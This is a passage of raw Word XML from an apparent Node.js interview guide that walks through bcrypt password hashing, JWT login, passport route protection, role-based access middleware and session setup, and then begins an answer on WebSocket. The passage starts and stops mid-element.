        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step 5: Structure the Project (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B541FA" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>As your API grows, consider structuring your project by separating routes, controllers, and services into different files for better maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F339E4" w14:textId="77777777" w:rsidR="00A17EE8" w:rsidRPr="00DA2F32" w:rsidRDefault="00A17EE8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B51B99"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17" w:name="_Toc178383200"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q17. How do you implement authentication and authorization in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="69299EAF" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementing authentication and authorization in Node.js typically involves several steps, including setting up a user model, handling user registration and login, managing user sessions or tokens, and applying access control to protect certain routes. Here’s a step-by-step guide to implementing both authentication and authorization in a Node.js application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB99D4D"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1. Setting Up the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D48B3B" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>First, set up a basic Node.js project with Express.js and the necessary packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1657B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mkdir auth-example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63311E6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cd auth-example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E68B527"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npm init -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA818B"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npm install express bcryptjs jsonwebtoken mongoose passport passport-jwt passport-local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42488C62"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2. Setting Up MongoDB and Mongoose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E721A" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For storing user data, MongoDB is commonly used with Mongoose as the ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC3BDF"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Example: User Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A2E3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mongoose = require('mongoose');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B561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bcrypt = require('bcryptjs');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6251B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9E5135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userSchema = new mongoose.Schema({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424169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username: { type: String, required: true, unique: true },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1782C5B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password: { type: String, required: true }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6EB4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4BDD8DD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D9732A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Hash the password before saving the user model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FA17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userSchema.pre('save', async function (next) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47630A4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(!this.isModified('password')) return next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F40B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this.password = await bcrypt.hash(this.password, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2289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next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBCB4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7141180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6943FD8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Compare input password with the hashed password stored in the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7062831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userSchema.methods.comparePassword = function (password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C72D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bcrypt.compare(password, this.password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE2EE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57BAC98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3D2504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User = mongoose.model('User', userSchema);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265EA6E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module.exports = User;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183505F1"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3. Implementing User Registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4531C039" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create a route for user registration where users can sign up with a username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A21F7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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719D713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mongoose = require('mongoose');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C4CA7"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User = require('./models/User'); // Assuming the User model is in models/User.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5733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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781E8F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DD1FE8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app.use(express.json());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D60F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E1EF11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mongoose.connect('mongodb://localhost/auth_example', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141348F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useNewUrlParser: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E2BDC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useUnifiedTopology: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97BF9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4B9E734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8B84534"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app.post('/register', async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7043A56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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2CF4C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 username, password } = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB81F8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user = new User({ username, password });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9E942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await user.save();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA562CB"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res.status(201).send('User registered successfully');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBF76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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  } catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF661D"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res.status(400).send('Error registering user');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D40B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489D3E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669309B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1E80EA4"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8671A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console.log('Server running on http://localhost:3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3303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391CB2CD"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4. Implementing User Login and JWT Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0424A3"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JSON Web Token (JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE439A" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JWT is commonly used for stateless authentication. When a user logs in successfully, the server generates a JWT that the client can use to authenticate subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F74423D"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Login Route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7F4A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jwt = require('jsonwebtoken');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A30BB4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A8C5C44"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app.post('/login', async (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC8A9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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EE18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 username, password } = req.body;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE19B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user = await User.findOne({ username });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED1AA7"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(!user) return res.status(401).send('Invalid username or password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02247A1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C6BD2B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isMatch = await user.comparePassword(password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E951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(!isMatch) return res.status(401).send('Invalid username or password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A541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70E8F42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token = jwt.sign({ id: user._id, username: user.username }, 'your_jwt_secret', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EBA1C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expiresIn: '1h',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A979C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0DB27DA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38B0A9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res.json({ token });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58213E8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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68C9C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res.status(500).send('Internal server error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651210D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011BF1E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281AF0F3"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5. Protecting Routes with JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A5433" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To protect routes, use middleware to verify the JWT before allowing access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDDF81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passport = require('passport');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482510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 ExtractJwt, Strategy: JwtStrategy } = require('passport-jwt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C7EB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B46439E"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opts = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719CD804"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jwtFromRequest: ExtractJwt.fromAuthHeaderAsBearerToken(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918069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secretOrKey: 'your_jwt_secret',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C0BEE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126919D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6510DFC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passport.use(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53651E7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new JwtStrategy(opts, async (jwt_payload, done) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694DD6C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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A346DB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user = await User.findById(jwt_payload.id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78613FB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(user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D671ED"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done(null, user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD632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E31585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done(null, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6615AEAE"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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB3D3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done(error, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7AE4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07506E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497699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0FBBC31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1382A64"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app.use(passport.initialize());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BEFA6B"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399CEA4"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Protect a route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E990F0B"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app.get('/protected', passport.authenticate('jwt', { session: false }), (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2EBF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res.send('This is a protected route');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82594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5FA926F4"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6. Authorization: Role-Based Access Control (RBAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77485732" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In addition to authentication, you often need to implement authorization to restrict access based on user roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D462355"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Adding Roles to the User Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CD58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userSchema = new mongoose.Schema({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67197A4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username: { type: String, required: true, unique: true },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57740F5D"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password: { type: String, required: true },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E576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role: { type: String, enum: ['user', 'admin'], default: 'user' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEAC9A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7945F176"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lastRenderedPageBreak/>
        <w:t>Middleware for Role-Based Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA966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authorize = (roles = []) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57F54E"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(typeof roles === 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AAB0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roles = [roles];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2FB80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04B4D7BE"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28C541A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274954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passport.authenticate('jwt', { session: false }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EECE7"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(req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F23314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(roles.length &amp;&amp; !roles.includes(req.user.role)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74268F6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res.status(403).send('Access denied');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658C3CE"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65C77B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next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7468DAE7"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5A2B7B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E6DF12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5AC9DFCD"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D9BABF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Admin-only route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282008AE"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app.get('/admin', authorize('admin'), (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9C3A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res.send('Admin content');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD4436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792A7698"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7. Using Sessions (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D149D8D" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If you prefer using sessions instead of JWT for authentication, you can use express-session and passport-local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED1FA3"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Installing Required Packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D24846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npm install express-session connect-mongo passport-local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8F7C2" w14:textId="77777777" w:rsidR="004D41D2" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Session Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB0C30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session = require('express-session');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2736034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MongoStore = require('connect-mongo');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27EB84"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passportLocal = require('passport-local');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C83206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passport = require('passport');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F46D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66CD991E"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app.use(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78780D2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session({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309CA72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secret: 'your_session_secret',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C50F8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resave: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F1AD2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saveUninitialized: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B5A7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store: MongoStore.create({ mongoUrl: 'mongodb://localhost/auth_example' }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1BAAFB"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97B27C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04B24A9A"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6E49DBB"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passport.use(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83FA1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new passportLocal.Strategy(async (username, password, done) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DC7BB"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E840B1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user = await User.findOne({ username });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA9D64E"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 (!user || !(await user.comparePassword(password))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F589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done(null, false, { message: 'Incorrect username or password' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76463BD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F72C70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done(null, user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71493CD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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AEF478"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return done(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE571A4"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045767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3DDD36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2003BDAF"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A909CF1"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passport.serializeUser((user, done) =&gt; done(null, user.id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1B68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passport.deserializeUser(async (id, done) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76230405"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const user = await User.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E2482"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done(null, user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB704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61FE766E"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7A124DB9"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app.use(passport.initialize());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CA466"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app.use(passport.session());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507BB000"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41BCCC3"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Login route with session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B29BC"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app.post('/login', passport.authenticate('local'), (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACCE36B" w14:textId="77777777" w:rsidR="004D41D2"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res.send('Logged in successfully');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A5ED2" w14:textId="6E3A516A" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="004D41D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68F09585"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18" w:name="_Toc178383201"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q18. What is WebSocket in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="0B5FE57F" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a communication protocol that provides full-duplex communication channels over a single, long-lived connection between a client and a server. Unlike HTTP, which is request-response based, WebSocket allows for continuous, real-time data </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exchange with low latency, making it ideal for applications like chat applications, real-time gaming, live updates, and notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F3F407" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Features of WebSocket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E5A7E7" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full-Duplex Communication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both client and server can send messages independently at any time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22673065" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Persistent Connection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A single connection remains open, reducing the overhead of establishing multiple connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB8669C" w14:textId="77777777" w:rsidR="00A258FD" w:rsidRPr="00DA2F32" w:rsidRDefault="00A258FD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
